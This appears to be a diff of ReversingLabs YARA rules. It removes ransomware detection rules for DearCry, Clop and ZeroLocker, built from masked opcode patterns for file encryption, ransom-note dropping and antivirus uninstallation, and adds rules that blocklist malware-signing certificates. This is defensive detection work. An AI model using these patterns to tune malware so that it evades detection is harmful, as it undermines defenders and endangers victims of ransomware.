-            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B
-            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44
-            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24
-            ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 EB
-            ?? 90 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
-            85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
-            04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "1f:9a:ca:06:9a:c1:b6:bf:b0:e1:48:61:ec:85:7b:f6" and 1477440000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dearcry : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DearCry ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6e2097e0-6495-5185-bbbc-e8168fa0ca7f"
-		date = "2021-03-12"
-		modified = "2021-03-12"
+		id = "3ad650b2-45ea-5324-b8dc-b48094ae2376"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DearCry.yara#L1-L96"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14296-L14312"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "40dde232255018e1bc0aadf2378a7a86a99327d13dda58d8ffc5bb38e164de26"
+		logic_hash = "d8f70ba61509f3df34705bea0bfcb4cce3e92a33f0f1b65315d886eb5592f152"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DearCry"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drop_ransom_note_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 50 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ??
-            ?? ?? 89 1D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 89 74 24 ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ??
-            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 3B F3 0F 84 ?? ?? ?? ?? 3B FB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 5C 24 ?? B8 ?? ?? ?? ?? 33 F6 8B FF
-            38 18 74 ?? 50 E8 ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 C4 ?? 8B D7 8A 08 88 0A 40 42 84
-            C9 75 ?? 8B C7 33 F6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 74 ?? 0F BE 14 37 52 E8 ??
-            ?? ?? ?? 88 04 37 8B C7 83 C4 ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ??
-            8B 74 24 ?? 46 89 74 24 ?? 69 F6 ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 3B C3 75 ?? 6A ?? 68
-        }
-		$drop_ransom_note_p2 = {
-            89 5C 24 ?? E8 ?? ?? ?? ?? 53 8B F0 53 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 56 89 44 24
-            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B F8 3B C3 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 53 51 88 5C 24 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8A 44 1C ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 0F 8C ?? ?? ?? ?? 3C ?? 0F 8F ?? ?? ?? ??
-            0F BE C0 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ??
-            8D 54 24 ?? 52 FF D6 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B
-            4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 51 52 50 6A ?? 8D 4C 24 ?? 51 57 E8 ?? ?? ?? ?? 0F
-            BE 54 1C ?? 68 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? B8 ?? ?? ?? ?? 8D 50
-            ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 56 2B C2 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 43 81 FB ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 33 DB 57
-        }
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64
-            A3 ?? ?? ?? ?? 89 65 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 75 ?? 89 B5 ?? ?? ?? ?? 8B 4D
-            ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ??
-            8B C6 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 8B C6 8D 50
-            ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 EB ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A
-            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B C6
-            8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 78 ?? 8A 08 40 84 C9
-            75 ?? 2B C7 03 C2 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B C3 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 83 F8 ?? 76 ?? B8 ?? ?? ??
-            ?? EB ?? 8B C3 8D 50 ?? 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 53 8D 55 ?? 52 E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? 33 FF 8D 45 ?? 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 74 ?? EB ?? 8D 49 ??
-            0F BE 44 3D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 3D ?? 47 8D 45 ?? 8D 50 ?? 8D A4 24
-            ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F8 72 ?? 8D 4D ?? 51 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A
-            11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB
-            ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B
-            C2 80 7C 30 ?? ?? 74 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 30 ?? ?? 74
-            ?? 8D 85 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? 8D 95 ?? ?? ??
-            ?? 52 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? 6A ?? 8B 9D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 57 8B 55 ??
-            52 8D BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ??
-            E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 65 ?? C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 8D 50 ?? 8B FF
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dong Qian" and pe.signatures [ i ] . serial == "3e:9d:26:dc:f7:03:ca:3b:14:0d:7e:7a:d4:83:12:e2" and 1440580240 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "be5e6f35-6177-50bb-82ea-55628acda4c2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14314-L14330"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "e89f722345fda82fd894d34169d1463997ae1d567d46badbf3138faa04cf8fa4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $drop_ransom_note_p* ) ) and ( all of ( $find_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "4e:25:23:e7:6e:a4:55:94:1e:75:fb:82:40:47:4a:75" and 1476403200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Clop : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Clop ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0ea63119-3773-5404-b332-8e3966fd35df"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "bcf0f1cc-44f2-5498-b9d7-9ad3f38e33bc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Clop.yara#L1-L109"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14332-L14348"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0b63db16a4b1cae27a97d0ff9df692a63f1a11120ffac69c05a5c71fbd224007"
+		logic_hash = "c1ae1562595ac6515a071a16195b46db6fad4ee0fe9757d366ee78b914e1de7f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Clop"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ??
-            ?? 51 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ??
-            ?? 8B 88 ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 8B 82 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B
-            91 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8
-            ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ??
-            ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            68 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
-            ?? 68 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            74 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 52 FF 15
-        }
-		$encrypt_files_p2 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 50 8D
-            4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8D 95 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ??
-            68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B
-            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D
-            ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 6A ?? 6A ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? E8 ?? ??
-            ?? ?? 50 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
-            E5 5D C2
-        }
-		$encrypt_files_p3 = {
-            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B
-            4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8D 4D ??
-            51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 8B 55 ?? 89 11 33 C0 8B E5 5D C3
-        }
-		$find_files = {
-            8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 76 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ??
-            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 E8
-        }
-		$uninstall_eset_av = {
-            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 8D ??
-            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:02:46:82:93:ba:73:08:d1:7e:fb:43:ad:6b:fb:58" and 1470960000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "033c9ce3-1676-5ad1-9ec1-08b3ffc585bb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14350-L14366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "20ec1e8e0570eb216304fd8453df315a26d9c170224177c325c10cbefc1993fb"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $uninstall_eset_av )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "6d:ed:1a:7f:f6:da:15:2a:98:a5:7a:2f" and 1479094343 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Zerolocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ZeroLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "291b5640-387c-54d9-97a6-13823932fa60"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "f86fbd6f-1635-56d7-b390-e067f81b8705"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.ZeroLocker.yara#L1-L70"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14368-L14384"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "147e4b390bcfaff8f05059c1d9a98b50f544fc32e820406417894fe5046e0f71"
+		logic_hash = "e17988cb2503e285cfe2ea74d7bc61c577d828e14fd5d8d8062e469dc75c449e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ZeroLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_routine_1 = {
-            00 28 5B 00 00 0A 20 ?? 07 00 00 28 60 00 00 06 13 09 20 ?? 07 00 00 28 60 00 00 06 13
